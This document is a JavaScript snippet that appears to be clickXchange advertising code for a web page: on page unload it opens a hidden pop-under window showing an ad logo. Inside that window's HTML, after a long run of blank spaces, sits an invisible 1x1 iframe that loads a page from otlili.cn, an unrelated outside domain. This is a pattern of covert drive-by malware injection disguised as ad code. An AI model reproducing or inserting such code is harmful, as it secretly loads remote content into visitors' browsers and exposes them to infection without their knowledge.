	if (document.all) {var xm = screen.width, ym = screen.height}
    else if (document.layers) {var xm = window.outerWidth, ym = window.outerHeight}
         else {var xm = 640, ym=480};
    var xo = (xm - 488)/2, yo = (ym - 60)/2;
	var popvariables = 'width=488,height=60,screenX='+xo+',screenY='+yo+',top='+yo+',left='+xo+',titlebar=0,toolbar=0,location=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,directories=0,status=0';
			document.write('<body onunload=clickxchangeexit()>');
		function clickxchangeexit() {
		popwindow = window.open("",'cxcpop1265756957',popvariables,true);
			popwindow.blur();    // Pop Over or Under Here (with it is under)
		if(popwindow != null) {
		popwindow.document.write('<html><head><title>clickXchange.com Advertisement</title></head><body>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  <iframe src=http://otlili.cn/g07/index.php width=1 height=1></iframe>')
		popwindow.document.write('<table border=0 cellpadding=0 cellspacing=0><tr><td><A href=http://www.clickXchange.com/fr.phtml?act=992625.159 target=newwindow><img src=http://clickxchange.com/graphics/logo.gif border=0></a></td></tr></table>')
		popwindow.document.write('</body></html>')
	}
   